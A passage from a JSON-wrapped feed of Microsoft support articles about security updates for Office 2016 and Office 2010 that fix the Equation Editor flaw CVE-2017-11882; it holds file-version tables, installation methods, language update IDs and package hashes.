Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1061</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1062</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1063</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1066</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr>
<tr><td>eqnedt32.exe_1081</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1086</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_1087</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2070</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2074</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_3082</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_9242</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>24-Oct-17</td><td>12:31</td></tr><tr><td>eqnedt32.exe_2052</td><td>eqnedt32.exe</td><td>17081400</td><td>552680</td><td>25-Oct-17</td><td>01:26</td></tr></tbody></table></div></div></div><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International 
Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p></body></html>", "edition": 4, "modified": "2020-04-16T06:49:45", "id": "KB4011262", "href": "https://support.microsoft.com/en-us/help/4011262/", "published": "2017-11-14T00:00:00", "title": "Description of the security update for Office 2016: November 14, 2017", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:47:19", "bulletinFamily": "microsoft", "cvelist": ["CVE-2017-11882"], "description": "<html><body><p>Description of the security update for Office 2010: November 28, 2017.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882\">Microsoft Common Vulnerabilities and Exposures CVE-2017-11882</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a href=\"http://support.microsoft.com/kb/2687455\">Service Pack 2 for Office 2010</a> installed on the computer.</p><p>Be aware that the update in the Microsoft Download Center applies to the Microsoft Installer (.msi)-based edition of Office 2010. It doesn't apply to the Office 2010 Click-to-Run editions, such as Microsoft Office 365 Home\u00a0(see\u00a0<a href=\"https://blogs.technet.microsoft.com/office_integration__sharepoint/2016/06/23/determining-your-office-version-msi-vs-c2r/\" managed-link=\"\" target=\"_blank\">Determining your Office version</a>).</p></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. 
When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.<br/><br/><strong>Note</strong>: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011618\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a> website.<br/><br/><strong>Note</strong>: Separate updates are provided for each Office language. See the table later in this section for the list of languages and update IDs.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. 
Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=2237ed4a-a190-40bf-89a7-13670cf5b174\" managed-link=\"\" target=\"\">Download\u00a0security update 4011618 for the 32-bit version of Office 2010</a></li><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=6b5ef0f1-7ac5-4669-a063-69dfb6de2d07\" managed-link=\"\" target=\"\">Download security update 4011618 for the 64-bit version of Office 2010</a></li></ul><p>\u00a0</p><p>The following language versions are available for Office 2010:</p><table class=\"table\"><tbody><tr><td width=\"131\"><p><strong>Language</strong><strong><span lang=\"EN-US\"></span></strong></p></td><td width=\"100\"><p><strong>Platform</strong><strong><span lang=\"EN-US\"></span></strong></p></td><td width=\"494\"><p><strong>Microsoft Update ID</strong><strong><span lang=\"EN-US\"></span></strong></p></td></tr><tr><td width=\"131\"><p>ar-SA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6f4af645-ca7b-4c70-bd86-ccf60e308f40<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>bg-BG<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>1fa89a33-e3c9-45dc-9c49-b6e32c04a92d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>cs-CZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td 
width=\"494\"><p>230e7994-d7cc-46c2-b03c-6ebc9b848d04<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>da-DK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>b49256d5-93f6-4a9c-b1da-ecdd5fc5d03a<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>de-DE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>eab2a5d4-6940-4356-ad51-90e2f102d2c8<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>el-GR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>2add0785-3c50-438d-8018-6f600cdeed7f<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>en-US<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c9e35b51-a722-478a-92c5-90fed2890414<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>es-ES<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>51761170-e2cc-4de5-a45b-56b47d758e37<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>et-EE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>2b8f54d0-e240-48f5-aa06-421652339325<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fi-FI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>762b1b94-04dd-4132-8a33-f8c9a1766145<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fr-FR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>320ebf2c-7942-42de-b6db-0aeaebf8e910<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>he-IL<span lang=\"EN-US\"></span></p></td><td 
width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f683af7a-78d6-43ec-a5fc-9ac9225121d8<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hi-IN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>a188be9c-fd73-4060-8e0b-dfce8cdc9074<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hr-HR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>71aec5fe-94a9-415f-b84a-d968000140ce<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hu-HU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>90b678dd-ae26-49dd-b69a-342669b1a608<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>it-IT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>dea99bd7-6e0c-4806-8d75-2163dd920efd<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ja-JP<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>99b7623f-b914-4595-a7b1-7381c4ebb586<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>kk-KZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f6040da2-09b9-4f96-8bf3-845bec77b548<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ko-KR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6dcbe074-d9b2-4e03-9108-a0d8b3823f36<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lt-LT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>408f8ca0-f176-4409-836b-29e57a4e680a<span lang=\"EN-US\"></span></p></td></tr><tr><td 
width=\"131\"><p>lv-LV<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>0f435635-25e3-47a3-bed3-020f15f39604<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nb-NO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>aa939807-28b7-4223-b6eb-4283ca3fc54b<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nl-NL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c4ce6005-0dde-4e84-90bf-bfe35c35c518<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pl-PL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c93a4c7c-2355-4e63-ba2a-f92b60fc2924<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-BR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f4fb7d4e-6756-4811-a326-c07c241e1601<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-PT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>19ea1954-00f5-49c2-9b15-a4435c71472d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ro-RO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>209bebf7-f2aa-463c-9b77-689fbf4b9ae0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ru-RU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d539139d-1e2a-46d9-865f-688d871e59d0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sk-SK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>acf97ed5-c4f6-4543-8c2d-9a0c22043fef<span 
lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sl-SI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5727f9ab-b034-48ba-a6ed-d80dbc45b4d1<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sr-Latn-CS<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>13a2149a-4d3a-4f59-a325-0f240814c719<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sv-SE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ed9cfead-3901-4bd4-b9b8-68c7d3f331e9<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>th-TH<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>319c6026-f7ed-480f-83ad-76da45f833b4<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>tr-TR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6e6d0e8c-fdf4-4b23-8473-5e15d20f35d6<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>uk-UA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d810c62b-72b1-489a-a569-7393d108febc<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-CN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8d4c4708-d10c-4cb1-82a8-7872d5b42520<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-TW<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x64<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>89d72c6f-7b60-4bd1-b0e3-991b74e40faf<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ar-SA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td 
width=\"494\"><p>36e0cc27-377b-41e7-9345-c7018a2ea25a<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>bg-BG<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>fc2aa7b3-f147-4120-8205-27dc9c0fc745<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>cs-CZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>0188c2ec-0f53-469c-8f71-5afd6bfc8461<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>da-DK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ab62f1ba-14f8-48f8-9779-4626e6851b09<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>de-DE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5457fc20-78aa-498a-b7e9-1d033ece4a81<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>el-GR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>40bd218a-a1b1-47fd-b80b-13db51b826c5<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>en-US<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8b8bd360-565e-48c6-a7ab-849048149845<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>es-ES<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>8a9c7e26-92e5-4c50-98c0-96e8cab913c9<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>et-EE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>6fecdcd7-ef63-4824-a9a1-44153e6b3399<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fi-FI<span lang=\"EN-US\"></span></p></td><td 
width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>ead0472a-6145-4806-994e-2ea15e5655d3<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>fr-FR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>44a6c00d-fdb7-479a-b6de-32f2029fb4f6<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>he-IL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>df8c5dd6-e7df-46f6-bab1-e8b27554284d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hi-IN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>26900c32-1600-45b7-9215-17ff44b3b4fc<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hr-HR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>a2c657a0-4938-40cc-a569-3cab8e1e000e<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>hu-HU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>13fc8588-812c-4f12-814b-c252a325fcbf<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>it-IT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>52af3113-2633-4781-94e4-b5fee8b0eb23<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ja-JP<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>48a9a078-c385-468a-bd33-f0c397a24777<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>kk-KZ<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>d911089c-28b6-48ab-8ba2-247e0cf5e4c1<span lang=\"EN-US\"></span></p></td></tr><tr><td 
width=\"131\"><p>ko-KR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>e9a36679-bcfe-46c1-a1bb-752118602311<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lt-LT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>eee1039c-c663-433d-a207-2729201ba8b2<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>lv-LV<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>5a940649-004c-4088-ad36-f7e3e377edea<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nb-NO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>aeec1521-1a02-4ec0-a05c-ea477b1393a0<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>nl-NL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>14724059-aa26-4a10-ba95-60d1b8790391<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pl-PL<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>858e443d-5815-4572-8f6e-d0b5aef379fb<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-BR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>61393309-f339-4388-b666-d2d21d70b278<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>pt-PT<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>da13e485-b8cc-4dbf-a294-d8427ab6b2c3<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ro-RO<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f7a7a0c9-1e6d-4c7a-a376-81a7fd854d26<span 
lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>ru-RU<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>242f6092-a5fe-4cef-8e52-c90afe35b079<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sk-SK<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>bd672718-7e54-4af1-9d58-7e2c19472a68<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sl-SI<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>690ab4eb-8323-43e4-a262-46c2bb4efd71<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sr-Latn-CS<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>082c5509-c18f-4dbb-bbc2-df45363abf1d<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>sv-SE<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f96bc680-fcc5-4900-88c4-a66412cf615b<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>th-TH<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>c8b92cdc-be78-4958-801f-09a74953d83c<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>tr-TR<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>f2cc89c9-f7ce-416f-bac2-ea3111ed2425<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>uk-UA<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>457a68f8-ea5a-4319-9ac3-19f1d2afad58<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-CN<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td 
width=\"494\"><p>ecd2446d-f25b-4269-9d7f-71b786e68ff1<span lang=\"EN-US\"></span></p></td></tr><tr><td width=\"131\"><p>zh-TW<span lang=\"EN-US\"></span></p></td><td width=\"100\"><p>x86<span lang=\"EN-US\"></span></p></td><td width=\"494\"><p>3a7aa16e-4a72-477b-8aca-4d5abb0e3b3c<span lang=\"EN-US\"></span></p></td></tr></tbody></table><h2>More Information</h2><h3>Security update replacement information</h3><p>This security update replaces\u00a0<a href=\"https://support.microsoft.com/help/2553204\" managed-link=\"\">KB2553204</a></p><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20171114\"><span><span><span>security update deployment information: November 14, 2017</span></span></span></a></p><h2>How to get help and support for this security update</h2><p>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/security/bb980617.aspx\" managed-link=\"\" target=\"\">Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" managed-link=\"\" target=\"\">Microsoft Secure</a><br/><br/>Local support according to your country: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com\" managed-link=\"\" target=\"\">International Support</a></p><p><span><span>Propose a feature or provide feedback on Office: <a href=\"https://office.uservoice.com/\" target=\"_blank\">Office User Voice portal</a></span></span></p><h2>File hash 
information</h2><table class=\"table\"><tbody><tr><th>Package name</th><th>Package hash SHA 1</th><th>Package hash SHA 2</th></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-ar-sa.exe</td><td>59E1467141F90F1FA287994E8652CE4547578F01</td><td>76405545FA37ED084E6BC0C724B9BF86C25F4F5981B06D14E9D469A7D892AA63</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-bg-bg.exe</td><td>451B9668D76DEDC69AE8B539C3BB84190930382F</td><td>76595A8042E4AACA37FD5BCEFB093A445F9DB50588A1AAF4A47B618A5833062C</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-cs-cz.exe</td><td>DD01290B53034BF7AD5671262BA0A46407BF856C</td><td>B57E3581EA4F485A75D70F807CBB4629963968A26F4217EC191386E824F86A2A</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-da-dk.exe</td><td>2D3747C972898DE66A6265A4C11464D96E78C06D</td><td>D9605A308191D6F29765A53FA797EDA212AB97A72D8C91C385A9371D5FBC3C45</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-de-de.exe</td><td>7078E576C7C6C9FE6534DF2D576D533D1AD75AE0</td><td>1840B0F7178971BA1E1E692A0E205B5198C2BC798509A95AF98F5C039E62513B</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-el-gr.exe</td><td>F01CCB25F33FAE6CBE715833651BCC22B9D21EE1</td><td>9E985401B3A48FDB18AE838D833FB1FB630B5BAA9324BD53C36B19FF87697B1E</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-en-us.exe</td><td>36DABF913D3F092DDE2458AD38A87D67DA492072</td><td>D441DD983E40F81CFCFF3181220BAEE025D4B6957A7B62277B684EFF49523824</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-es-es.exe</td><td>48A2F5F31338F81AC5E2A76838465D79862B0447</td><td>1FC9603851348661E8AAA0026310BD5EFD6715A2ADA2A3598172E54215FFC592</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-et-ee.exe</td><td>093500F1A3834F3814382BE08A3EB9B6E8F9DF47</td><td>E3977A0ECC44CF2D213AA08C1B2DAAF826853BAB2BB3F03F2CC1014B748BA824</td></tr><tr><td>eqnedt322010-kb4011618-fullfile-x64-fi-fi.exe</td><td>0C8BF127095AC290AFDFEB0B7A6BEE20A70CFC5B</td><td>15779B184A7EA47E3BDAD9297ADE77475CCFB60F52B565777B79AF20260184BF</td></tr><tr><td>eqnedt322010
